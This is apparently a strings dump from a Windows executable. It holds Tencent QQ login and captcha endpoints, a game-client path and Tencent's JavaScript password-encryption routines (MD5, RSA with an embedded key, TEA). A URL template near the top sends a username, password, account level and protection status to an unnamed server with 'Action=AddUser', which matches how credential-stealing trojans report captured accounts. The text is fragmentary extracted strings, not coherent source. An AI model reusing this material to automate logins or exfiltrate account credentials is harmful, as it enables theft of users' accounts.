ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz
<@gIpNoMsMvDlAhEtIpK9MqIiCtMyIlKkK9MkArKtMkA9KjMlIjC
nickname : '
&Level=30&ToKen=%B5%C7%C2%BC%B1%A3%BB%A4%5BNO%5D%B6%FE%BC%B6%C3%DC%C2%EB%5BNO%5D&Beta=20150417
&Pass=
&User=
?Action=AddUser&Server=
http://www.baidu.com/
\TCLS\Client.exe
http://ui.ptlogin2.qq.com/cgi-bin/login?link_target=blank&appid=12000101&s_url=http://kf.qq.com/other/for_your_service.shtml
login_sig:"
&u1=http%3A%2F%2Faq.qq.com%2Fcn2%2Findex&r=
&appid=2001601&js_ver=10120&js_type=0&login_sig=
https://ssl.ptlogin2.qq.com/check?uin=
&u1=http%3A%2F%2Fkf.qq.com%2Fgame%2Fbusiness.html%3Fcode%3Ddnf&r=
&appid=12000101&js_ver=10120&js_type=1&login_sig=
http://check.ptlogin2.qq.com/check?regmaster=&pt_tea=1&pt_vcode=0&uin=
'([\s\S]*?)'
ptvfsession=
ScriptControl
JScript
Language
function time(){return Math.random()}
ExecuteStatement
@o@{B96B3CAE-0728-11D3-9D7B-0000F81EF32E}
&aid=12000101&cap_cd=
http://captcha.qq.com/getimage?uin=
,@var navigator=navigator||{};var window=window||{};$=window.$||{};var hexcase=1;var b64pad='';var chrsz=8;var mode=32;function md5(s){return hex_md5(s)}
function hex_md5(s){return binl2hex(core_md5(str2binl(s),s.length*chrsz))}
function str_md5(s){return binl2str(core_md5(str2binl(s),s.length*chrsz))}
function hex_hmac_md5(key,data){return binl2hex(core_hmac_md5(key,data))}
function b64_hmac_md5(key,data){return binl2b64(core_hmac_md5(key,data))}
function str_hmac_md5(key,data){return binl2str(core_hmac_md5(key,data))}
function core_md5(x,len){x[len>>5]|=128<<((len)%32);x[(((len+64)>>>9)<<4)+14]=len;var a=1732584193;var b=-271733879;var c=-1732584194;var d=271733878;for(var i=0;i<x.length;i+=16){var olda=a;var oldb=b;var oldc=c;var oldd=d;a=md5_ff(a,b,c,d,x[i+0],7,-680876936);d=md5_ff(d,a,b,c,x[i+1],12,-389564586);c=md5_ff(c,d,a,b,x[i+2],17,606105819);b=md5_ff(b,c,d,a,x[i+3],22,-1044525330);a=md5_ff(a,b,c,d,x[i+4],7,-176418897);d=md5_ff(d,a,b,c,x[i+5],12,1200080426);c=md5_ff(c,d,a,b,x[i+6],17,-1473231341);b=md5_ff(b,c,d,a,x[i+7],22,-45705983);a=md5_ff(a,b,c,d,x[i+8],7,1770035416);d=md5_ff(d,a,b,c,x[i+9],12,-1958414417);c=md5_ff(c,d,a,b,x[i+10],17,-42063);b=md5_ff(b,c,d,a,x[i+11],22,-1990404162);a=md5_ff(a,b,c,d,x[i+12],7,1804603682);d=md5_ff(d,a,b,c,x[i+13],12,-40341101);c=md5_ff(c,d,a,b,x[i+14],17,-1502002290);b=md5_ff(b,c,d,a,x[i+15],22,1236535329);a=md5_gg(a,b,c,d,x[i+1],5,-165796510);d=md5_gg(d,a,b,c,x[i+6],9,-1069501632);c=md5_gg(c,d,a,b,x[i+11],14,643717713);b=md5_gg(b,c,d,a,x[i+0],20,-373897302);a=md5_gg(a,b,c,d,x[i+5],5,-701558691);d=md5_gg(d,a,b,c,x[i+10],9,38016083);c=md5_gg(c,d,a,b,x[i+15],14,-660478335);b=md5_gg(b,c,d,a,x[i+4],20,-405537848);a=md5_gg(a,b,c,d,x[i+9],5,568446438);d=md5_gg(d,a,b,c,x[i+14],9,-1019803690);c=md5_gg(c,d,a,b,x[i+3],14,-187363961);b=md5_gg(b,c,d,a,x[i+8],20,1163531501);a=md5_gg(a,b,c,d,x[i+13],5,-1444681467);d=md5_gg(d,a,b,c,x[i+2],9,-51403784);c=md5_gg(c,d,a,b,x[i+7],14,1735328473);b=md5_gg(b,c,d,a,x[i+12],20,-1926607734);a=md5_hh(a,b,c,d,x[i+5],4,-378558);d=md5_hh(d,a,b,c,x[i+8],11,-2022574463);c=md5_hh(c,d,a,b,x[i+11],16,1839030562);b=md5_hh(b,c,d,a,x[i+14],23,-35309556);a=md5_hh(a,b,c,d,x[i+1],4,-1530992060);d=md5_hh(d,a,b,c,x[i+4],11,1272893353);c=md5_hh(c,d,a,b,x[i+7],16,-155497632);b=md5_hh(b,c,d,a,x[i+10],23,-1094730640);a=md5_hh(a,b,c,d,x[i+13],4,681279174);d=md5_hh(d,a,b,c,x[i+0],11,-358537222);c=md5_hh(c,d,a,b,x[i+3],16,-722521979);b=md5_hh(b,c,d,a,x[i+6],23,76029189);a=md5_hh(a,b,c,d,x[i+9],4,-640364487);d=md5_hh(d,a,b,c,x[i+12],11,-421815835);c=md5_hh(c,d,a,b,x[i+15],16,530742520);b=md5_hh(b,c,d,a,x[i+2],23,-995338651);a=md5_ii(a,b,c,d,x[i+0],6,-198630844);d=md5_ii(d,a,b,c,x[i+7],10,1126891415);c=md5_ii(c,d,a,b,x[i+14],15,-1416354905);b=md5_ii(b,c,d,a,x[i+5],21,-57434055);a=md5_ii(a,b,c,d,x[i+12],6,1700485571);d=md5_ii(d,a,b,c,x[i+3],10,-1894986606);c=md5_ii(c,d,a,b,x[i+10],15,-1051523);b=md5_ii(b,c,d,a,x[i+1],21,-2054922799);a=md5_ii(a,b,c,d,x[i+8],6,1873313359);d=md5_ii(d,a,b,c,x[i+15],10,-30611744);c=md5_ii(c,d,a,b,x[i+6],15,-1560198380);b=md5_ii(b,c,d,a,x[i+13],21,1309151649);a=md5_ii(a,b,c,d,x[i+4],6,-145523070);d=md5_ii(d,a,b,c,x[i+11],10,-1120210379);c=md5_ii(c,d,a,b,x[i+2],15,718787259);b=md5_ii(b,c,d,a,x[i+9],21,-343485551);a=safe_add(a,olda);b=safe_add(b,oldb);c=safe_add(c,oldc);d=safe_add(d,oldd)}
if(mode==16){return Array(b,c)}else{return Array(a,b,c,d)}}
function md5_cmn(q,a,b,x,s,t){return safe_add(bit_rol(safe_add(safe_add(a,q),safe_add(x,t)),s),b)}
function md5_ff(a,b,c,d,x,s,t){return md5_cmn((b&c)|((~b)&d),a,b,x,s,t)}
function md5_gg(a,b,c,d,x,s,t){return md5_cmn((b&d)|(c&(~d)),a,b,x,s,t)}
function md5_hh(a,b,c,d,x,s,t){return md5_cmn(b^c^d,a,b,x,s,t)}
function md5_ii(a,b,c,d,x,s,t){return md5_cmn(c^(b|(~d)),a,b,x,s,t)}
function core_hmac_md5(key,data){var bkey=str2binl(key);if(bkey.length>16){bkey=core_md5(bkey,key.length*chrsz)}
var ipad=Array(16),opad=Array(16);for(var i=0;i<16;i++){ipad[i]=bkey[i]^909522486;opad[i]=bkey[i]^1549556828}
var hash=core_md5(ipad.concat(str2binl(data)),512+data.length*chrsz);return core_md5(opad.concat(hash),512+128)}
function safe_add(x,y){var lsw=(x&65535)+(y&65535);var msw=(x>>16)+(y>>16)+(lsw>>16);return(msw<<16)|(lsw&65535)}
function bit_rol(num,cnt){return(num<<cnt)|(num>>>(32-cnt))}
function str2binl(str){var bin=Array();var mask=(1<<chrsz)-1;for(var i=0;i<str.length*chrsz;i+=chrsz){bin[i>>5]|=(str.charCodeAt(i/chrsz)&mask)<<(i%32)}
return bin}
function binl2str(bin){var str='';var mask=(1<<chrsz)-1;for(var i=0;i<bin.length*32;i+=chrsz){str+=String.fromCharCode((bin[i>>5]>>>(i%32))&mask)}
return str}
function binl2hex(binarray){var hex_tab=hexcase?'0123456789ABCDEF':'0123456789abcdef';var str='';for(var i=0;i<binarray.length*4;i++){str+=hex_tab.charAt((binarray[i>>2]>>((i%4)*8+4))&15)+hex_tab.charAt((binarray[i>>2]>>((i%4)*8))&15)}
return str}
function binl2b64(binarray){var tab='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';var str='';for(var i=0;i<binarray.length*4;i+=3){var triplet=(((binarray[i>>2]>>8*(i%4))&255)<<16)|(((binarray[i+1>>2]>>8*((i+1)%4))&255)<<8)|((binarray[i+2>>2]>>8*((i+2)%4))&255);for(var j=0;j<4;j++){if(i*8+j*6>binarray.length*32){str+=b64pad}else{str+=tab.charAt((triplet>>6*(3-j))&63)}}}
return str}
function hexchar2bin(str){var arr=[];for(var i=0;i<str.length;i=i+2){arr.push('\\x'+str.substr(i,2))}
arr=arr.join('');eval('var temp = \''+arr+'\'');return temp}
function __monitor(mid,probability){}
function getEncryption(password,salt,vcode,isMd5){vcode=vcode||'';password=password||'';var md5Pwd=isMd5?password:md5(password),h1=hexchar2bin(md5Pwd),s2=md5(h1+salt),rsaH1=$.RSA.rsa_encrypt(h1),rsaH1Len=(rsaH1.length/2).toString(16),hexVcode=TEA.strToBytes(vcode.toUpperCase()),vcodeLen='000'+vcode.length.toString(16);while(rsaH1Len.length<4){rsaH1Len='0'+rsaH1Len}
TEA.initkey(s2);var saltPwd=TEA.enAsBase64(rsaH1Len+rsaH1+TEA.strToBytes(salt)+vcodeLen+hexVcode);TEA.initkey('');__monitor(488358,1);return saltPwd.replace(/[\/\+=]/g,function(a){return{'/':'-','+':'*','=':'_'}
[a]})}
function getRSAEncryption(password,vcode,isMd5){var str1=isMd5?password:md5(password);var str2=str1+vcode.toUpperCase();var str3=$.RSA.rsa_encrypt(str2);return str3}
$.RSA=function(){function h(z,t){return new au(z,t)}
function aj(aC,aD){var t='';var z=0;while(z+aD<aC.length){t+=aC.substring(z,z+aD)+'\n';z+=aD}
return t+aC.substring(z,aC.length)}
function u(t){if(t<16){return'0'+t.toString(16)}else{return t.toString(16)}}
function ah(aD,aG){if(aG<aD.length+11){uv_alert('Message too long for RSA');return null}
var aF=new Array();var aC=aD.length-1;while(aC>=0&&aG>0){var aE=aD.charCodeAt(aC--);aF[--aG]=aE}
aF[--aG]=0;var z=new af();var t=new Array();while(aG>2){t[0]=0;while(t[0]==0){z.nextBytes(t)}
aF[--aG]=t[0]}
aF[--aG]=2;aF[--aG]=0;return new au(aF)}
function N(){this.n=null;this.e=0;this.d=null;this.p=null;this.q=null;this.dmp1=null;this.dmq1=null;this.coeff=null}
function q(z,t){if(z!=null&&t!=null&&z.length>0&&t.length>0){this.n=h(z,16);this.e=parseInt(t,16)}else{uv_alert('Invalid RSA public key')}}
function Y(t){return t.modPowInt(this.e,this.n)}
function r(aC){var t=ah(aC,(this.n.bitLength()+7)>>3);if(t==null){return null}
var aD=this.doPublic(t);if(aD==null){return null}
var z=aD.toString(16);if((z.length&1)==0){return z}else{return'0'+z}}
N.prototype.doPublic=Y;N.prototype.setPublic=q;N.prototype.encrypt=r;var ay;var ak=244837814094590;var ab=((ak&16777215)==15715070);function au(z,t,aC){if(z!=null){if('number'==typeof z){this.fromNumber(z,t,aC)}else{if(t==null&&'string'!=typeof z){this.fromString(z,256)}else{this.fromString(z,t)}}}}
function j(){return new au(null)}
function b(aE,t,z,aD,aG,aF){while(--aF>=0){var aC=t*this[aE++]+z[aD]+aG;aG=Math.floor(aC/67108864);z[aD++]=aC&67108863}
return aG}
function aA(aE,aJ,aK,aD,aH,t){var aG=aJ&32767,aI=aJ>>15;while(--t>=0){var aC=this[aE]&32767;var aF=this[aE++]>>15;var z=aI*aC+aF*aG;aC=aG*aC+((z&32767)<<15)+aK[aD]+(aH&1073741823);aH=(aC>>>30)+(z>>>15)+aI*aF+(aH>>>30);aK[aD++]=aC&1073741823}
return aH}
function az(aE,aJ,aK,aD,aH,t){var aG=aJ&16383,aI=aJ>>14;while(--t>=0){var aC=this[aE]&16383;var aF=this[aE++]>>14;var z=aI*aC+aF*aG;aC=aG*aC+((z&16383)<<14)+aK[aD]+aH;aH=(aC>>28)+(z>>14)+aI*aF;aK[aD++]=aC&268435455}
return aH}
if(ab&&(navigator.appName=='Microsoft Internet Explorer')){au.prototype.am=aA;ay=30}else{if(ab&&(navigator.appName!='Netscape')){au.prototype.am=b;ay=26}else{au.prototype.am=az;ay=28}}
au.prototype.DB=ay;au.prototype.DM=((1<<ay)-1);au.prototype.DV=(1<<ay);var ac=52;au.prototype.FV=Math.pow(2,ac);au.prototype.F1=ac-ay;au.prototype.F2=2*ay-ac;var ag='0123456789abcdefghijklmnopqrstuvwxyz';var ai=new Array();var ar,x;ar='0'.charCodeAt(0);for(x=0;x<=9;++x){ai[ar++]=x}
ar='a'.charCodeAt(0);for(x=10;x<36;++x){ai[ar++]=x}
ar='A'.charCodeAt(0);for(x=10;x<36;++x){ai[ar++]=x}
function aB(t){return ag.charAt(t)}
function C(z,t){var aC=ai[z.charCodeAt(t)];return(aC==null)?-1:aC}
function aa(z){for(var t=this.t-1;t>=0;--t){z[t]=this[t]}
z.t=this.t;z.s=this.s}
function p(t){this.t=1;this.s=(t<0)?-1:0;if(t>0){this[0]=t}else{if(t<-1){this[0]=t+DV}else{this.t=0}}}
function c(t){var z=j();z.fromInt(t);return z}
function y(aG,z){var aD;if(z==16){aD=4}else{if(z==8){aD=3}else{if(z==256){aD=8}else{if(z==2){aD=1}else{if(z==32){aD=5}else{if(z==4){aD=2}else{this.fromRadix(aG,z);return}}}}}}
this.t=0;this.s=0;var aF=aG.length,aC=false,aE=0;while(--aF>=0){var t=(aD==8)?aG[aF]&255:C(aG,aF);if(t<0){if(aG.charAt(aF)=='-'){aC=true}
continue}
aC=false;if(aE==0){this[this.t++]=t}else{if(aE+aD>this.DB){this[this.t-1]|=(t&((1<<(this.DB-aE))-1))<<aE;this[this.t++]=(t>>(this.DB-aE))}else{this[this.t-1]|=t<<aE}}
aE+=aD;if(aE>=this.DB){aE-=this.DB}}
if(aD==8&&(aG[0]&128)!=0){this.s=-1;if(aE>0){this[this.t-1]|=((1<<(this.DB-aE))-1)<<aE}}
this.clamp();if(aC){au.ZERO.subTo(this,this)}}
function Q(){var t=this.s&this.DM;while(this.t>0&&this[this.t-1]==t){--this.t}}
function s(z){if(this.s<0){return'-'+this.negate().toString(z)}
var aC;if(z==16){aC=4}else{if(z==8){aC=3}else{if(z==2){aC=1}else{if(z==32){aC=5}else{if(z==4){aC=2}else{return this.toRadix(z)}}}}}
var aE=(1<<aC)-1,aH,t=false,aF='',aD=this.t;var aG=this.DB-(aD*this.DB)%aC;if(aD-->0){if(aG<this.DB&&(aH=this[aD]>>aG)>0){t=true;aF=aB(aH)}
while(aD>=0){if(aG<aC){aH=(this[aD]&((1<<aG)-1))<<(aC-aG);aH|=this[--aD]>>(aG+=this.DB-aC)}else{aH=(this[aD]>>(aG-=aC))&aE;if(aG<=0){aG+=this.DB;--aD}}
if(aH>0){t=true}
if(t){aF+=aB(aH)}}}
return t?aF:'0'}
function T(){var t=j();au.ZERO.subTo(this,t);return t}
function an(){return(this.s<0)?this.negate():this}
function I(t){var aC=this.s-t.s;if(aC!=0){return aC}
var z=this.t;aC=z-t.t;if(aC!=0){return aC}
while(--z>=0){if((aC=this[z]-t[z])!=0){return aC}}
return 0}
function l(z){var aD=1,aC;if((aC=z>>>16)!=0){z=aC;aD+=16}
if((aC=z>>8)!=0){z=aC;aD+=8}
if((aC=z>>4)!=0){z=aC;aD+=4}
if((aC=z>>2)!=0){z=aC;aD+=2}
if((aC=z>>1)!=0){z=aC;aD+=1}
return aD}
function w(){if(this.t<=0){return 0}
return this.DB*(this.t-1)+l(this[this.t-1]^(this.s&this.DM))}
function at(aC,z){var t;for(t=this.t-1;t>=0;--t){z[t+aC]=this[t]}
for(t=aC-1;t>=0;--t){z[t]=0}
z.t=this.t+aC;z.s=this.s}
function Z(aC,z){for(var t=aC;t<this.t;++t){z[t-aC]=this[t]}
z.t=Math.max(this.t-aC,0);z.s=this.s}
function v(aH,aD){var z=aH%this.DB;var t=this.DB-z;var aF=(1<<t)-1;var aE=Math.floor(aH/this.DB),aG=(this.s<<z)&this.DM,aC;for(aC=this.t-1;aC>=0;--aC){aD[aC+aE+1]=(this[aC]>>t)|aG;aG=(this[aC]&aF)<<z}
for(aC=aE-1;aC>=0;--aC){aD[aC]=0}
aD[aE]=aG;aD.t=this.t+aE+1;aD.s=this.s;aD.clamp()}
function n(aG,aD){aD.s=this.s;var aE=Math.floor(aG/this.DB);if(aE>=this.t){aD.t=0;return}
var z=aG%this.DB;var t=this.DB-z;var aF=(1<<z)-1;aD[0]=this[aE]>>z;for(var aC=aE+1;aC<this.t;++aC){aD[aC-aE-1]|=(this[aC]&aF)<<t;aD[aC-aE]=this[aC]>>z}
if(z>0){aD[this.t-aE-1]|=(this.s&aF)<<t}
aD.t=this.t-aE;aD.clamp()}
function ad(z,aD){var aC=0,aE=0,t=Math.min(z.t,this.t);while(aC<t){aE+=this[aC]-z[aC];aD[aC++]=aE&this.DM;aE>>=this.DB}
if(z.t<this.t){aE-=z.s;while(aC<this.t){aE+=this[aC];aD[aC++]=aE&this.DM;aE>>=this.DB}
aE+=this.s}else{aE+=this.s;while(aC<z.t){aE-=z[aC];aD[aC++]=aE&this.DM;aE>>=this.DB}
aE-=z.s}
aD.s=(aE<0)?-1:0;if(aE<-1){aD[aC++]=this.DV+aE}else{if(aE>0){aD[aC++]=aE}}
aD.t=aC;aD.clamp()}
function F(z,aD){var t=this.abs(),aE=z.abs();var aC=t.t;aD.t=aC+aE.t;while(--aC>=0){aD[aC]=0}
for(aC=0;aC<aE.t;++aC){aD[aC+t.t]=t.am(0,aE[aC],aD,aC,0,t.t)}
aD.s=0;aD.clamp();if(this.s!=z.s){au.ZERO.subTo(aD,aD)}}
function S(aC){var t=this.abs();var z=aC.t=2*t.t;while(--z>=0){aC[z]=0}
for(z=0;z<t.t-1;++z){var aD=t.am(z,t[z],aC,2*z,0,1);if((aC[z+t.t]+=t.am(z+1,2*t[z],aC,2*z+1,aD,t.t-z-1))>=t.DV){aC[z+t.t]-=t.DV;aC[z+t.t+1]=1}}
if(aC.t>0){aC[aC.t-1]+=t.am(z,t[z],aC,2*z,0,1)}
aC.s=0;aC.clamp()}
function G(aK,aH,aG){var aQ=aK.abs();if(aQ.t<=0){return}
var aI=this.abs();if(aI.t<aQ.t){if(aH!=null){aH.fromInt(0)}
if(aG!=null){this.copyTo(aG)}
return}
if(aG==null){aG=j()}
var aE=j(),z=this.s,aJ=aK.s;var aP=this.DB-l(aQ[aQ.t-1]);if(aP>0){aQ.lShiftTo(aP,aE);aI.lShiftTo(aP,aG)}else{aQ.copyTo(aE);aI.copyTo(aG)}
var aM=aE.t;var aC=aE[aM-1];if(aC==0){return}
var aL=aC*(1<<this.F1)+((aM>1)?aE[aM-2]>>this.F2:0);var aT=this.FV/aL,aS=(1<<this.F1)/aL,aR=1<<this.F2;var aO=aG.t,aN=aO-aM,aF=(aH==null)?j():aH;aE.dlShiftTo(aN,aF);if(aG.compareTo(aF)>=0){aG[aG.t++]=1;aG.subTo(aF,aG)}
au.ONE.dlShiftTo(aM,aF);aF.subTo(aE,aE);while(aE.t<aM){aE[aE.t++]=0}
while(--aN>=0){var aD=(aG[--aO]==aC)?this.DM:Math.floor(aG[aO]*aT+(aG[aO-1]+aR)*aS);if((aG[aO]+=aE.am(0,aD,aG,aN,0,aM))<aD){aE.dlShiftTo(aN,aF);aG.subTo(aF,aG);while(aG[aO]<--aD){aG.subTo(aF,aG)}}}
if(aH!=null){aG.drShiftTo(aM,aH);if(z!=aJ){au.ZERO.subTo(aH,aH)}}
aG.t=aM;aG.clamp();if(aP>0){aG.rShiftTo(aP,aG)}
if(z<0){au.ZERO.subTo(aG,aG)}}
function P(t){var z=j();this.abs().divRemTo(t,null,z);if(this.s<0&&z.compareTo(au.ZERO)>0){t.subTo(z,z)}
return z}
function M(t){this.m=t}
function X(t){if(t.s<0||t.compareTo(this.m)>=0){return t.mod(this.m)}else{return t}}
function am(t){return t}
function L(t){t.divRemTo(this.m,null,t)}
function J(t,aC,z){t.multiplyTo(aC,z);this.reduce(z)}
function aw(t,z){t.squareTo(z);this.reduce(z)}
M.prototype.convert=X;M.prototype.revert=am;M.prototype.reduce=L;M.prototype.mulTo=J;M.prototype.sqrTo=aw;function D(){if(this.t<1){return 0}
var t=this[0];if((t&1)==0){return 0}
var z=t&3;z=(z*(2-(t&15)*z))&15;z=(z*(2-(t&255)*z))&255;z=(z*(2-(((t&65535)*z)&65535)))&65535;z=(z*(2-t*z%this.DV))%this.DV;return(z>0)?this.DV-z:-z}
function g(t){this.m=t;this.mp=t.invDigit();this.mpl=this.mp&32767;this.mph=this.mp>>15;this.um=(1<<(t.DB-15))-1;this.mt2=2*t.t}
function al(t){var z=j();t.abs().dlShiftTo(this.m.t,z);z.divRemTo(this.m,null,z);if(t.s<0&&z.compareTo(au.ZERO)>0){this.m.subTo(z,z)}
return z}
function av(t){var z=j();t.copyTo(z);this.reduce(z);return z}
function R(t){while(t.t<=this.mt2){t[t.t++]=0}
for(var aC=0;aC<this.m.t;++aC){var z=t[aC]&32767;var aD=(z*this.mpl+(((z*this.mph+(t[aC]>>15)*this.mpl)&this.um)<<15))&t.DM;z=aC+this.m.t;t[z]+=this.m.am(0,aD,t,aC,0,this.m.t);while(t[z]>=t.DV){t[z]-=t.DV;t[++z]++}}
t.clamp();t.drShiftTo(this.m.t,t);if(t.compareTo(this.m)>=0){t.subTo(this.m,t)}}
function ao(t,z){t.squareTo(z);this.reduce(z)}
function B(t,aC,z){t.multiplyTo(aC,z);this.reduce(z)}
g.prototype.convert=al;g.prototype.revert=av;g.prototype.reduce=R;g.prototype.mulTo=B;g.prototype.sqrTo=ao;function k(){return((this.t>0)?(this[0]&1):this.s)==0}
function A(aH,aI){if(aH>4294967295||aH<1){return au.ONE}
var aG=j(),aC=j(),aF=aI.convert(this),aE=l(aH)-1;aF.copyTo(aG);while(--aE>=0){aI.sqrTo(aG,aC);if((aH&(1<<aE))>0){aI.mulTo(aC,aF,aG)}else{var aD=aG;aG=aC;aC=aD}}
return aI.revert(aG)}
function ap(aC,t){var aD;if(aC<256||t.isEven()){aD=new M(t)}else{aD=new g(t)}
return this.exp(aC,aD)}
au.prototype.copyTo=aa;au.prototype.fromInt=p;au.prototype.fromString=y;au.prototype.clamp=Q;au.prototype.dlShiftTo=at;au.prototype.drShiftTo=Z;au.prototype.lShiftTo=v;au.prototype.rShiftTo=n;au.prototype.subTo=ad;au.prototype.multiplyTo=F;au.prototype.squareTo=S;au.prototype.divRemTo=G;au.prototype.invDigit=D;au.prototype.isEven=k;au.prototype.exp=A;au.prototype.toString=s;au.prototype.negate=T;au.prototype.abs=an;au.prototype.compareTo=I;au.prototype.bitLength=w;au.prototype.mod=P;au.prototype.modPowInt=ap;au.ZERO=c(0);au.ONE=c(1);var o;var W;var ae;function d(t){W[ae++]^=t&255;W[ae++]^=(t>>8)&255;W[ae++]^=(t>>16)&255;W[ae++]^=(t>>24)&255;if(ae>=O){ae-=O}}
function V(){d(new Date().getTime())}
if(W==null){W=new Array();ae=0;var K;if(navigator.appName=='Netscape'&&navigator.appVersion<'5'&&window.crypto&&window.crypto.random){var H=window.crypto.random(32);for(K=0;K<H.length;++K){W[ae++]=H.charCodeAt(K)&255}}
while(ae<O){K=Math.floor(65536*Math.random());W[ae++]=K>>>8;W[ae++]=K&255}
ae=0;V()}
function E(){if(o==null){V();o=aq();o.init(W);for(ae=0;ae<W.length;++ae){W[ae]=0}
return o.next()}
function ax(z){var t;for(t=0;t<z.length;++t){z[t]=E()}}
function af(){}
af.prototype.nextBytes=ax;function m(){this.i=0;this.j=0;this.S=new Array()}
function f(aE){var aD,z,aC;for(aD=0;aD<256;++aD){this.S[aD]=aD}
z=0;for(aD=0;aD<256;++aD){z=(z+this.S[aD]+aE[aD%aE.length])&255;aC=this.S[aD];this.S[aD]=this.S[z];this.S[z]=aC}
this.i=0;this.j=0}
function a(){var z;this.i=(this.i+1)&255;this.j=(this.j+this.S[this.i])&255;z=this.S[this.i];this.S[this.i]=this.S[this.j];this.S[this.j]=z;return this.S[(z+this.S[this.i])&255]}
m.prototype.init=f;m.prototype.next=a;function aq(){return new m()}
var O=256;function U(aD,aC,z){aC='F20CE00BAE5361F8FA3AE9CEFA495362FF7DA1BA628F64A347F0A8C012BF0B254A30CD92ABFFE7A6EE0DC424CB6166F8819EFA5BCCB20EDFB4AD02E412CCF579B1CA711D55B8B0B3AEB60153D5E0693A2A86F3167D7847A0CB8B00004716A9095D9BADC977CBB804DBDCBA6029A9710869A453F27DFDDF83C016D928B3CBF4C7';z='3';var t=new N();t.setPublic(aC,z);return t.encrypt(aD)}
return{rsa_encrypt:U}}();var s=window||{};(function(s){var t='',a=0,h=[],y=[],z=0,v=0,n=[],u=[],o=true;function f(){return Math.round(Math.random()*4294967295)}
function k(D,E,A){if(!A||A>4){A=4}
var B=0;for(var C=E;C<E+A;C++){B<<=8;B|=D[C]}
return(B&4294967295)>>>0}
function b(B,C,A){B[C+3]=(A>>0)&255;B[C+2]=(A>>8)&255;B[C+1]=(A>>16)&255;B[C+0]=(A>>24)&255}
function x(D){if(!D){return''}
var A='';for(var B=0;B<D.length;B++){var C=Number(D[B]).toString(16);if(C.length==1){C='0'+C}
return A}
function w(B){var C='';for(var A=0;A<B.length;A+=2){C+=String.fromCharCode(parseInt(B.substr(A,2),16))}
return C}
function c(C){if(!C){return''}
var B=[];for(var A=0;A<C.length;A++){B[A]=C.charCodeAt(A)}
return x(B)}
function j(C){h=new Array(8);y=new Array(8);z=v=0;o=true;a=0;var A=C.length;var D=0;a=(A+10)%8;if(a!=0){a=8-a}
n=new Array(A+a+10);h[0]=((f()&248)|a)&255;for(var B=1;B<=a;B++){h[B]=f()&255}
a++;for(var B=0;B<8;B++){y[B]=0}
D=1;while(D<=2){if(a<8){h[a++]=f()&255;D++}
if(a==8){q()}}
var B=0;while(A>0){if(a<8){h[a++]=C[B++];A--}
if(a==8){q()}}
D=1;while(D<=7){if(a<8){h[a++]=0;D++}
if(a==8){q()}}
return n}
function r(E){var D=0;var B=new Array(8);var A=E.length;u=E;if(A%8!=0||A<16){return null}
y=m(E);a=y[0]&7;D=A-a-10;if(D<0){return null}
for(var C=0;C<B.length;C++){B[C]=0}
n=new Array(D);v=0;z=8;a++;var F=1;while(F<=2){if(a<8){a++;F++}
if(a==8){B=E;if(!g()){return null}}}
var C=0;while(D!=0){if(a<8){n[C]=(B[v+a]^y[a])&255;C++;D--;a++}
if(a==8){B=E;v=z-8;if(!g()){return null}}}
for(F=1;F<8;F++){if(a<8){if((B[v+a]^y[a])!=0){return null}
if(a==8){B=E;v=z;if(!g()){return null}}}
return n}
function q(){for(var A=0;A<8;A++){if(o){h[A]^=y[A]}else{h[A]^=n[v+A]}}
var B=l(h);for(var A=0;A<8;A++){n[z+A]=B[A]^y[A];y[A]=h[A]}
v=z;z+=8;a=0;o=false}
function l(A){var B=16;var G=k(A,0,4);var F=k(A,4,4);var I=k(t,0,4);var H=k(t,4,4);var E=k(t,8,4);var D=k(t,12,4);var C=0;var J=2654435769>>>0;while(B-->0){C+=J;C=(C&4294967295)>>>0;G+=((F<<4)+I)^(F+C)^((F>>>5)+H);G=(G&4294967295)>>>0;F+=((G<<4)+E)^(G+C)^((G>>>5)+D);F=(F&4294967295)>>>0}
var K=new Array(8);b(K,0,G);b(K,4,F);return K}
function m(A){var B=16;var G=k(A,0,4);var F=k(A,4,4);var I=k(t,0,4);var H=k(t,4,4);var E=k(t,8,4);var D=k(t,12,4);var C=3816266640>>>0;var J=2654435769>>>0;while(B-->0){F-=((G<<4)+E)^(G+C)^((G>>>5)+D);F=(F&4294967295)>>>0;G-=((F<<4)+I)^(F+C)^((F>>>5)+H);G=(G&4294967295)>>>0;C-=J;C=(C&4294967295)>>>0}
var K=new Array(8);b(K,0,G);b(K,4,F);return K}
function g(){var A=u.length;for(var B=0;B<8;B++){y[B]^=u[z+B]}
y=m(y);z+=8;a=0;return true}
function p(E,D){var C=[];if(D){for(var B=0;B<E.length;B++){C[B]=E.charCodeAt(B)&255}}else{var A=0;for(var B=0;B<E.length;B+=2){C[A++]=parseInt(E.substr(B,2),16)}}
return C}
s.TEA={encrypt:function(D,C){var B=p(D,C);var A=j(B);return x(A)},enAsBase64:function(F,E){var D=p(F,E);var C=j(D);var A='';for(var B=0;B<C.length;B++){A+=String.fromCharCode(C[B])}
return d.encode(A)},decrypt:function(C){var B=p(C,false);var A=r(B);return x(A)},initkey:function(A,B){t=p(A,B)},bytesToStr:w,strToBytes:c,bytesInStr:x,dataFromStr:p};var d={};d.PADCHAR='=';d.ALPHA='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';d.getbyte=function(C,B){var A=C.charCodeAt(B);if(A>255){throw'INVALID_CHARACTER_ERR: DOM Exception 5'}
return A};d.encode=function(E){if(arguments.length!=1){throw'SyntaxError: Not enough arguments'}
var B=d.PADCHAR;var G=d.ALPHA;var F=d.getbyte;var D,H;var A=[];E=''+E;var C=E.length-E.length%3;if(E.length==0){return E}
for(D=0;D<C;D+=3){H=(F(E,D)<<16)|(F(E,D+1)<<8)|F(E,D+2);A.push(G.charAt(H>>18));A.push(G.charAt((H>>12)&63));A.push(G.charAt((H>>6)&63));A.push(G.charAt(H&63))}
switch(E.length-C){case 1:H=F(E,D)<<16;A.push(G.charAt(H>>18)+G.charAt((H>>12)&63)+B+B);break;case 2:H=(F(E,D)<<16)|(F(E,D+1)<<8);A.push(G.charAt(H>>18)+G.charAt((H>>12)&63)+G.charAt((H>>6)&63)+B);break}
return A.join('')};if(!window.btoa){window.btoa=d.encode}})(window);function uin2hex(str){var maxLength=16;str=parseInt(str);var hex=str.toString(16);var len=hex.length;for(var i=len;i<maxLength;i++){hex='0'+hex}
var arr=[];for(var j=0;j<maxLength;j+=2){arr.push('\\x'+hex.substr(j,2))}
var result=arr.join('');eval('result="'+result+'"');return result}
